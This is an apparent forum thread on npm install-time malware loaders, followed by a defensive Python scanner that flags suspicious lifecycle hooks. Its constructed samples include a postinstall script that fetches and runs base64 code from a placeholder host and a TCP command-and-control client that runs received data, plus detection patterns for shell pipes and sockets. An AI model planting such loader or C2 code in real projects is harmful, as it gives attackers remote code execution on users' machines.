1 point by reymon-dev 2 hours ago | 1 comment
  • _alphageek 2 hours ago
    These attacks evolve each year. The initial ones were just obfuscated code inside some utilities like a jest/tailwind config; the most sophisticated I have seen is obfuscated code loaded on chain. So you cannot find any trace in the packages, but when you start/install it, it loads transaction info, decodes it, and boom, you are hacked. So the safest way is not to run it, or to run it in an isolated Docker environment.
    • reymon-dev 2 hours ago
      Yeah... the on-chain payload delivery is a clever evolution; it removes the static artifact entirely. In this case they used a similar approach, but with a Vercel-hosted serverless endpoint as the loader instead of on-chain data. Same principle: nothing malicious exists in the repo itself; the payload is fetched at runtime. The two-stage split (ephemeral loader vs. persistent TCP C2) was the part I hadn't seen well documented before.
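The pattern both commenters describe (a lifecycle hook that fetches a payload at install time and executes it, with a persistent TCP client as the second stage) leaves a small but recognizable footprint in the package itself even when the payload does not. As an added example, not code from this thread or from any project discussed in it, here is a heuristic scanner that looks for that footprint in `package.json` install hooks and the scripts they run. The package contents, hostnames and the "captured" stage-2 sample are all constructed for the demo; the indicator lists are assumptions about what a loader typically needs (a fetch, a decode step, a dynamic-execution primitive), not a signature of any real campaign.

```python
"""
Heuristic scan for npm install hooks that act as runtime loaders.
Added example; all package contents and URLs below are constructed.
"""
import json
import re
from dataclasses import dataclass
from typing import Optional

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Indicator groups (assumed, not exhaustive): what a loader needs to fetch,
# decode and run a payload, and what a stage-2 client needs for a TCP C2 channel.
INDICATORS = {
    "network_fetch": re.compile(
        r"\b(fetch\s*\(|https?\.(get|request)\s*\(|axios\.(get|post)\b|require\(['\"]node-fetch['\"]\))"),
    "dynamic_exec": re.compile(
        r"\b(eval\s*\(|new\s+Function\s*\(|vm\.runIn\w+Context\s*\(|child_process)"),
    "decode": re.compile(r"Buffer\.from\s*\([^)]*['\"](base64|hex)['\"]\)|\batob\s*\("),
    "persistent_socket": re.compile(r"\bnet\.(connect|createConnection)\s*\(|new\s+net\.Socket\s*\("),
}
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s'\"]*)?")
SHELL_PIPE_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b")


@dataclass
class Finding:
    package: str
    hook: str
    reason: str
    evidence: str


def indicators(src: str) -> set[str]:
    """Which indicator groups appear in a JS source string."""
    return {label for label, rx in INDICATORS.items() if rx.search(src)}


def classify(found: set[str]) -> list[str]:
    """Map indicator combinations to the two stages the thread describes."""
    reasons = []
    if {"network_fetch", "dynamic_exec"} <= found:
        reasons.append("remote_loader")          # stage 1: fetch + execute
    if {"persistent_socket", "dynamic_exec"} <= found:
        reasons.append("interactive_c2_client")  # stage 2: socket + execute
    return reasons


def _hook_target(command: str) -> Optional[str]:
    """Return the JS file a hook like 'node setup.js' executes, if any."""
    m = re.match(r"\s*node\s+([\w./\-]+\.c?m?js)\b", command)
    return m.group(1) if m else None


def scan_package(package_json: str, files: dict[str, str]) -> list[Finding]:
    """Scan lifecycle hooks in package.json and the scripts they invoke."""
    pkg = json.loads(package_json)
    name = pkg.get("name", "<unnamed>")
    scripts = pkg.get("scripts", {})
    findings: list[Finding] = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        if SHELL_PIPE_RE.search(cmd):  # e.g. 'curl ... | sh' straight from the hook
            findings.append(Finding(name, hook, "shell_pipe_to_interpreter", cmd))
        target = _hook_target(cmd)
        src = files.get(target, "") if target else ""
        if not src:
            continue
        found = indicators(src)
        for reason in classify(found):
            evidence = f"{target}: {sorted(found)} urls={URL_RE.findall(src)}"
            findings.append(Finding(name, hook, reason, evidence))
    return findings


# Constructed sample 1: a benign build step run from postinstall.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "benign-lib", "scripts": {"postinstall": "node scripts/build.js"}})
BENIGN_FILES = {"scripts/build.js":
    "const fs = require('fs');\nfs.writeFileSync('dist/index.js', 'module.exports = {};');\n"}

# Constructed sample 2: repo contains only a loader; the payload lives elsewhere.
SUSPICIOUS_PACKAGE_JSON = json.dumps({
    "name": "suspicious-lib", "scripts": {"postinstall": "node setup.js"}})
SUSPICIOUS_FILES = {"setup.js": (
    "const https = require('https');\n"
    "https.get('https://loader.example.com/stage1', res => {\n"  # placeholder host
    "  let body = '';\n"
    "  res.on('data', c => body += c);\n"
    "  res.on('end', () => {\n"
    "    const code = Buffer.from(body, 'base64').toString();\n"
    "    new Function(code)();\n"
    "  });\n"
    "});\n")}

# Constructed sample 3: what a fetched stage-2 might look like (persistent TCP client).
STAGE2_SAMPLE = (
    "const net = require('net');\n"
    "const sock = net.connect(4444, 'c2.example.com');\n"  # placeholder host
    "sock.on('data', d => new Function(d.toString())());\n")

if __name__ == "__main__":
    for f in scan_package(SUSPICIOUS_PACKAGE_JSON, SUSPICIOUS_FILES):
        print(f)
    print("stage-2 classification:", classify(indicators(STAGE2_SAMPLE)))
```

The scanner only sees what is in the package, so on the stage-1 side it can flag the fetch-and-execute shape and the endpoint it contacts, but never the payload; `STAGE2_SAMPLE` shows how the same indicator check applies to code captured from the loader endpoint or from the running process. As a cheap complement, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, which is the install-time half of the "don't run it, or run it isolated" advice above.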